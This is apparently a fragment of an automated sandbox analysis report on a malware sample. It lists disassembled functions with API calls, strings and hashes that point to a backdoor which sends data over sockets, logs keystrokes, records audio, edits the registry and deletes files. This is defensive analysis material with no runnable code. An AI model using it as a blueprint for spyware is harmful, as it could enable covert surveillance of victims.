                              • Opcode Fuzzy Hash: 14f04f78e8f7430bc4bd69958249ffd5d817d18415e9be8f89f862f13594ae1e
                              • Instruction Fuzzy Hash: 46F090721002947AC231AB239C8CDEB3FBCDAD7F65710807EF44612181CAB89945C2B9
                              Function 0040EF4B Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                              Download Yara Rule
                              APIs
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?), ref: 0040EF60
                              • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040EF72
                              • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000), ref: 0040EF7E
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040EF9F
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040EFA8
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@$??1?$basic_string@?length@?$basic_string@A?$basic_string@D@1@@V01@@
                              • String ID:
                              • API String ID: 1435062097-0
                              • Opcode ID: 20075cc94b158e45fadc6d86183d5be30a195f63fcca5debc30167b5daaf2194
                              • Instruction ID: 6b6ba2759fc20d09fe660d68a9c76a1e637e25a4b848d32c772961ab34e95e59
                              • Opcode Fuzzy Hash: 20075cc94b158e45fadc6d86183d5be30a195f63fcca5debc30167b5daaf2194
                              • Instruction Fuzzy Hash: CE019E7540015AEFCB008F64DC889EE7BB8FF48314F008455EC5697280DA749A44CB50
                              Function 004036F3 Relevance: 7.5, APIs: 5, Instructions: 33COMMON
                              Download Yara Rule
                              APIs
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00403701
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040370E
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040371B
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00403728
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00403735
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$??0?$basic_string@D@1@@D@2@@std@@D@std@@U?$char_traits@
                              • String ID:
                              • API String ID: 4257247948-0
                              • Opcode ID: 282da47049af24501e856da2357ac17247e55dafe8a2a8a5931536da7051f424
                              • Instruction ID: dac1581c1d28e517801eb3be04acf8c600069e7031f390e60f55bb430ac4377d
                              • Opcode Fuzzy Hash: 282da47049af24501e856da2357ac17247e55dafe8a2a8a5931536da7051f424
                              • Instruction Fuzzy Hash: B2F0C97140461AAFCB14DFA4DC8C9DAB7FCFE5820870008A9A183D3510EA75F64ACB54
                              Function 004025EF Relevance: 7.5, APIs: 5, Instructions: 33networkCOMMON
                              Download Yara Rule
                              APIs
                              • socket.WS2_32(00000000,00000001,00000006), ref: 004025F9
                              • connect.WS2_32(00000000,00415278,00000010), ref: 00402608
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000006,?,?,00408D8C), ref: 0040261B
                                • Part of subcall function 00402504: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00415940,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 0040250E
                                • Part of subcall function 00402504: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([DataStart]0000,?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 00402522
                                • Part of subcall function 00402504: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 0040252D
                                • Part of subcall function 00402504: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 00402541
                                • Part of subcall function 00402504: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2), ref: 0040254D
                                • Part of subcall function 00402504: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 00402556
                                • Part of subcall function 00402504: ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 00402561
                                • Part of subcall function 00402504: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2), ref: 00402570
                                • Part of subcall function 00402504: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2), ref: 0040257A
                                • Part of subcall function 00402504: send.WS2_32(?,00000000), ref: 00402584
                                • Part of subcall function 00402504: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 004025DB
                                • Part of subcall function 00402504: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 004025E4
                              • closesocket.WS2_32(00000000), ref: 00402630
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000,00415278,00000010,00000000,00000001,00000006,?,?,00408D8C), ref: 0040263B
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@?length@?$basic_string@V01@@$??4?$basic_string@?data@?$basic_string@?empty@?$basic_string@A?$basic_string@D@1@@D@2@@0@Hstd@@V01@V10@0@V?$basic_string@closesocketconnectsendsocket
                              • String ID:
                              • API String ID: 2015417588-0
                              • Opcode ID: afd6ee4ba49ead645863e6814483f123e0b3b1fe0a8a6986ee26414a986e6055
                              • Instruction ID: 3ac3c1af87fc4ba09d50238af9d46122a468a8ea4431591f33cc56d3a1d2174b
                              • Opcode Fuzzy Hash: afd6ee4ba49ead645863e6814483f123e0b3b1fe0a8a6986ee26414a986e6055
                              • Instruction Fuzzy Hash: 42F0A73164111537D62076759D0ABDB3A188B12795F00017AFD05B61C1EAF9894482DD
                              Function 0040E4E6 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                              Download Yara Rule
                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0040E4FD
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?), ref: 0040E511
                              • ?find_last_of@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP60(00411844,6A3F5E04), ref: 0040E526
                              • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 0040E535
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E53E
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@??1?$basic_string@?find_last_of@?$basic_string@?substr@?$basic_string@D@1@@FileModuleNameV12@
                              • String ID:
                              • API String ID: 2641972318-0
                              • Opcode ID: d402ba14c3a2e1978bc613bd61c4e803cb42440e16ad61c5612e90c530be73d1
                              • Instruction ID: 1e1a59f65a474f258a2f266179515592e576b6157cd272470b44933d2ea38500
                              • Opcode Fuzzy Hash: d402ba14c3a2e1978bc613bd61c4e803cb42440e16ad61c5612e90c530be73d1
                              • Instruction Fuzzy Hash: 83F0D07150010FEFDF44DF94ED4AFED7B78EB04309F108061B605A61A0DAB0AA89CF65
                              Function 0040520C Relevance: 7.5, APIs: 5, Instructions: 25fileCOMMON
                              Download Yara Rule
                              APIs
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(004156C0,76F93520,00405285), ref: 00405213
                              • DeleteFileA.KERNEL32(00000000), ref: 0040521A
                              • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00415660,00410668), ref: 0040522E
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040523C
                              • RemoveDirectoryA.KERNEL32(00000000), ref: 00405243
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: D@std@@U?$char_traits@V?$allocator@$?c_str@?$basic_string@D@2@@std@@$??9std@@D@2@@0@DeleteDirectoryFileRemoveV?$basic_string@
                              • String ID:
                              • API String ID: 485653077-0
                              • Opcode ID: 3979d79b3fe9aba7c53ae26c4f3c4978edfa256f4a3cec73ad257c73c55fecea
                              • Instruction ID: 49b04f277348f71567298f07d152f4b3d3d547bd3422a61795910190b4fb5562
                              • Opcode Fuzzy Hash: 3979d79b3fe9aba7c53ae26c4f3c4978edfa256f4a3cec73ad257c73c55fecea
                              • Instruction Fuzzy Hash: C3E086762416219BCA041BF0AC0C9CB371CAE45212300417BF402E36A0CFF98CC48B5C
                              Function 004036B7 Relevance: 7.5, APIs: 5, Instructions: 16COMMON
                              Download Yara Rule
                              APIs
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004036C7
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004036D0
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004036D9
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004036E2
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004036EB
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: ??1?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@
                              • String ID:
                              • API String ID: 2599707790-0
                              • Opcode ID: ac5247aa85bbd6be4254a4db4df1c1c2bebf39489b54b834f55a8b66f66bf73a
                              • Instruction ID: ce469ae2fa8136e1a9f0fe53df6847e3631b9c5038cfbca0e221b482f1c808aa
                              • Opcode Fuzzy Hash: ac5247aa85bbd6be4254a4db4df1c1c2bebf39489b54b834f55a8b66f66bf73a
                              • Instruction Fuzzy Hash: A8E00A31210557CBC7249F30EA5C4E5B764BA91619300447A9157515B0DFB4AD49CB5D
                              Function 0040908B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29registryCOMMON
                              Download Yara Rule
                              APIs
                              • RegCreateKeyA.ADVAPI32(00409B23,?,?), ref: 00409098
                              • RegSetValueExA.ADVAPI32(?,hRA,00000000,0000000B,?,00000008,00415268,?,00409B23,00000000), ref: 004090B3
                              • RegCloseKey.ADVAPI32(?,?,00409B23,00000000), ref: 004090BE
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseCreateValue
                              • String ID: hRA
                              • API String ID: 1818849710-819137882
                              • Opcode ID: 47dcfed047945252874ef2030ec9f55be3ad7af594f0f386cf4e6306e2d48049
                              • Instruction ID: 45296832074a86694a0120e67756151a47aa0ea66b010438851f7b77956f428d
                              • Opcode Fuzzy Hash: 47dcfed047945252874ef2030ec9f55be3ad7af594f0f386cf4e6306e2d48049
                              • Instruction Fuzzy Hash: A4E0C932540218BBDF115F90FD05FDA3B6DEB08761F00C021FE199A161D771DA609B54
                              Function 004035F3 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 23COMMON
                              Download Yara Rule
                              APIs
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(invalid vector<T> subscript,?), ref: 00403605
                              • ??0out_of_range@std@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@1@@Z.MSVCP60(?), ref: 00403612
                              • _CxxThrowException.MSVCRT(?,004119F0), ref: 00403621
                                • Part of subcall function 0040FC2C: free.MSVCRT(?,00401C53,?,?,00401C39,00000000,?,00401BE7,?,?,00401B82,?,00000000,?,?,00401B4A), ref: 0040FC30
                              Strings
                              • invalid vector<T> subscript, xrefs: 00403600
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@std@@U?$char_traits@$??0?$basic_string@??0out_of_range@std@@D@1@@D@2@@1@@D@2@@std@@ExceptionThrowV?$basic_string@free
                              • String ID: invalid vector<T> subscript
                              • API String ID: 2273067808-3016609489
                              • Opcode ID: 23a2721963ee5b81bf9d54976ac51af616b6fac7c107dadb20cd092e6ff66c0e
                              • Instruction ID: d1dc714aa17fc7b7442ac04cbb7cbb2b6be57595b17b16616ed7d09586dc421c
                              • Opcode Fuzzy Hash: 23a2721963ee5b81bf9d54976ac51af616b6fac7c107dadb20cd092e6ff66c0e
                              • Instruction Fuzzy Hash: F3E0487185420F7BDF04FBE1DD4ADEEB77DFA14305B504036F904A20A0EA756A4ACB69
                              Function 004012C8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22COMMON
                              Download Yara Rule
                              APIs
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(invalid vector<T> subscript,?,?,?,?,?,004012A3,?,?,?,004074B7,0000000E,004108CC,00000000), ref: 004012DA
                              • ??0out_of_range@std@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@1@@Z.MSVCP60(?,?,?,?,?,004012A3,?,?,?,004074B7,0000000E,004108CC,00000000), ref: 004012E7
                              • _CxxThrowException.MSVCRT(?,004119F0), ref: 004012F6
                                • Part of subcall function 00401305: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00401300,?,?,?,?,004012A3,?,?,?,004074B7,0000000E,004108CC,00000000), ref: 00401312
                              Strings
                              • invalid vector<T> subscript, xrefs: 004012D5
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@std@@U?$char_traits@$??0?$basic_string@D@1@@D@2@@std@@$??0out_of_range@std@@D@2@@1@@ExceptionThrowV?$basic_string@
                              • String ID: invalid vector<T> subscript
                              • API String ID: 4148323614-3016609489
                              • Opcode ID: 9661a228b2e9748f7b8567c3925db49a400b5d1eaa57c5b6f529c0f008786bf5
                              • Instruction ID: 885d5109308db86c39cf624aab1bba59d6d0b6b2a3733cbd4a3c7a04b8bfaa9f
                              • Opcode Fuzzy Hash: 9661a228b2e9748f7b8567c3925db49a400b5d1eaa57c5b6f529c0f008786bf5
                              • Instruction Fuzzy Hash: 53E0127181410FAADB04F7E5D94ADED777CB9043057600036BD02B24E1DAB855498B2A
                              Function 0040F89D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 8libraryloaderCOMMON
                              Download Yara Rule
                              APIs
                              • LoadLibraryA.KERNEL32(kernel32.dll,GetConsoleWindow), ref: 0040F8AC
                              • GetProcAddress.KERNEL32(00000000), ref: 0040F8B3
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressLibraryLoadProc
                              • String ID: GetConsoleWindow$kernel32.dll
                              • API String ID: 2574300362-100875112
                              • Opcode ID: 510d5923eb8639a7d885d72a367858d9807e1c659d0f746c0c92ce176c01cde6
                              • Instruction ID: 827c4046bcd6e5c73998b2cbf4f49e030bf6490dcf6eebc42fb88a3b65635bfa
                              • Opcode Fuzzy Hash: 510d5923eb8639a7d885d72a367858d9807e1c659d0f746c0c92ce176c01cde6
                              • Instruction Fuzzy Hash: 69C092B5980200BFD7106FA1EC4DED93AB4AA48742720C136F60AE19B4CBBD10C19A1E
                              Function 0040147C Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                              Download Yara Rule
                              APIs
                              • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60(?,00000000,00415268,?,00401465,00000000,?,?,?,0040B52E,00000000), ref: 00401498
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,00401465,00000000,?,?,?,0040B52E,00000000), ref: 004014B0
                              • waveInPrepareHeader.WINMM(025D11D8,00000020,?,00401465,00000000,?,?,?,0040B52E,00000000), ref: 00401508
                              • waveInAddBuffer.WINMM(?,00000020,?,00401465,00000000,?,?,?,0040B52E,00000000), ref: 0040151E
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@wave$?c_str@?$basic_string@?resize@?$basic_string@BufferHeaderPrepare
                              • String ID:
                              • API String ID: 1952094867-0
                              • Opcode ID: c43d5b855978ab5546af03f7988427d20661d7bf7e5b36f0c6026f81f0c57d97
                              • Instruction ID: 607d35f18d4bb3c038525a4507ad7304f57bd8fd619bab3b66f3d3b81191445e
                              • Opcode Fuzzy Hash: c43d5b855978ab5546af03f7988427d20661d7bf7e5b36f0c6026f81f0c57d97
                              • Instruction Fuzzy Hash: BD110D35A10A00FFCB168F55EC58BEA7BA5EBC9318700C47EEA4EC7365D671A841CB48
                              Function 00408EF1 Relevance: 6.0, APIs: 4, Instructions: 37registryCOMMON
                              Download Yara Rule
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,80000002), ref: 00408F12
                              • RegQueryValueExA.ADVAPI32(80000002,004075CB,00000000,00000000,?,00000400), ref: 00408F31
                              • RegCloseKey.ADVAPI32(80000002), ref: 00408F3A
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00410668,?), ref: 00408F59
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$??0?$basic_string@CloseD@1@@D@2@@std@@D@std@@OpenQueryU?$char_traits@Value
                              • String ID:
                              • API String ID: 2462357041-0
                              • Opcode ID: 6096438dd2eed9e4574e4a1dd84254fd0db2e199f98c401320f7f766a01d9ba8
                              • Instruction ID: af5f393f80e90c15eb86e02cdebdcddb53bb09070e540c88b9aeee95ea817081
                              • Opcode Fuzzy Hash: 6096438dd2eed9e4574e4a1dd84254fd0db2e199f98c401320f7f766a01d9ba8
                              • Instruction Fuzzy Hash: CB01E4B510010EBFDB11DF50ED45FDA7B7DEB08704F508162BB19AA0A0D7B0AA59DB58
                              Function 00404336 Relevance: 6.0, APIs: 4, Instructions: 35threadCOMMON
                              Download Yara Rule
                              APIs
                              • TerminateThread.KERNEL32(00000000,00000000,00415A30,00415940,00415268,0040A63B,0040A71E,00000001), ref: 0040434C
                              • CloseHandle.KERNEL32(00000000), ref: 0040435C
                              • UnhookWindowsHookEx.USER32(00000000), ref: 0040436E
                              • TerminateThread.KERNEL32(0040380C,00000000), ref: 0040437C
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: TerminateThread$CloseHandleHookUnhookWindows
                              • String ID:
                              • API String ID: 952708117-0
                              • Opcode ID: 21f92a0503a4c508299fb2519971da6ba8f4e0d620dc769b09316a04903e5818
                              • Instruction ID: b3774055a663eb231de0d977992da6d56e6fa1a05363ce64aae77dfed93c93a6
                              • Opcode Fuzzy Hash: 21f92a0503a4c508299fb2519971da6ba8f4e0d620dc769b09316a04903e5818
                              • Instruction Fuzzy Hash: 2BF0E9B22003446FD7715F644CC089BBB9DBA95360350287FEAC293A11C275EC819718
                              Function 00403A9A Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                              Download Yara Rule
                              APIs
                              • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,76F90F00,?,00405E64), ref: 00403AAD
                              • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,76F90F00,?,00405E64), ref: 00403AC0
                              • SetEvent.KERNEL32(00000000,?,00405E64), ref: 00403AC9
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(76F90F00,?,00405E64), ref: 00403AD8
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$V01@V01@@Y?$basic_string@$??1?$basic_string@Event
                              • String ID:
                              • API String ID: 3911305588-0
                              • Opcode ID: 16b6dc50432d68f6dd9f781edfb67808caec510018263165bfcd570da917996e
                              • Instruction ID: 0779d908e9be27da86272a0c0adb87f85a3e9ee435f515b886d5906f097178b3
                              • Opcode Fuzzy Hash: 16b6dc50432d68f6dd9f781edfb67808caec510018263165bfcd570da917996e
                              • Instruction Fuzzy Hash: CEF08231000749EFCB11CFA0D94CED67FA9AF05345F444469E58742961DB74F988CB58
                              Function 0040ED0C Relevance: 6.0, APIs: 4, Instructions: 18threadCOMMON
                              Download Yara Rule
                              APIs
                              • GetCurrentProcess.KERNEL32(?,00000000,00000001,00000002,6A41AFB0,?,0040C570,?), ref: 0040ED1F
                              • GetCurrentThread.KERNEL32 ref: 0040ED22
                              • GetCurrentProcess.KERNEL32(00000000,?,0040C570,?), ref: 0040ED29
                              • DuplicateHandle.KERNEL32(00000000,?,0040C570,?), ref: 0040ED2C
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: Current$Process$DuplicateHandleThread
                              • String ID:
                              • API String ID: 3566409357-0
                              • Opcode ID: 3fa07ae3144d30a73874091d85fe8529b928e5454c1455a9c948a55732be91ca
                              • Instruction ID: a27c7ae999809b9e73f37912e12988bcc4cb6827362b4042a6689fcf131767f6
                              • Opcode Fuzzy Hash: 3fa07ae3144d30a73874091d85fe8529b928e5454c1455a9c948a55732be91ca
                              • Instruction Fuzzy Hash: 58D09E7194021C77D91027B5AC0EFC63E1CDB05761F008421B608A6091C6F654818BE4
                              Function 0040506E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON
                              Download Yara Rule
                              APIs
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60( [LCtrl] ,?), ref: 004050A4
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$??0?$basic_string@D@1@@D@2@@std@@D@std@@U?$char_traits@
                              • String ID: [LCtrl] $ [RCtrl]
                              • API String ID: 4257247948-618823999
                              • Opcode ID: 0168a093b53f0bbe9d1f7a75df0fb87eb8cb959a489310096b2281c4288ad07d
                              • Instruction ID: 69a1fac85d8d50c9318be5c9ee5530278cac5bde9cdc7065c5d4e5bcd0292750
                              • Opcode Fuzzy Hash: 0168a093b53f0bbe9d1f7a75df0fb87eb8cb959a489310096b2281c4288ad07d
                              • Instruction Fuzzy Hash: 69E09B317006047FDA14A65DC81BEBF76ACDB40754F400167F901E72C0D9F95D4086DB